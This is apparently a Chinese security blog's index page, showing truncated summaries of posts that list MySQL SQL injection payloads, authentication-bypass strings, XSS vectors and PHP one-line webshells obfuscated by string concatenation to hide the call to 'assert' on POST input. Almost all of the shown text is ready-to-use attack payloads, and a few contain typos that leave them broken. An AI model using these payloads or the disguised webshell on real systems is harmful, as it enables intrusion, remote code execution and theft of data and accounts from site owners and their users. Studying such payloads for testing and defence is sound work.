摘要:
mysql手工注入 注释后面语句(引号闭合) 常用的注释payload or 1=1--+ 'or 1=1--+ "or 1=1--+ )or 1=1--+ ')or 1=1--+ ") or 1=1--+ "))or 1=1--+ 查询字段数目() 查询字段数目主要利用MySQL里面的 order 阅读全文
摘要:
一句话木马 php 方法 字符串变形: substr(string, start, length) <?php $a = 'a'.'s'.'s'.'e'.'r'.'t'; $a($_POST['x']); ?> <?php $a = substr('1a',1).'s'.'s'.'e'.'r'.'t 阅读全文
摘要:
sql注入整理 ' or 1=1--+ ' or 1=1-- ' or 1=1# ' or 1='1 ' || 1='1 ' || 1=1--+ ')or('a'='a "or"="a'='a --> ??? 'or''=' 'or'='or' -->??? 1 or '1'='1'=1 -->?? 阅读全文
摘要:
xss cross-site-scripting javascript 嵌入html <sctipt>alert("XSS");</script> 元素标签:<body onload=alert('XSS')> 图片:<img src="javascript:alert("XSS);"> 其 阅读全文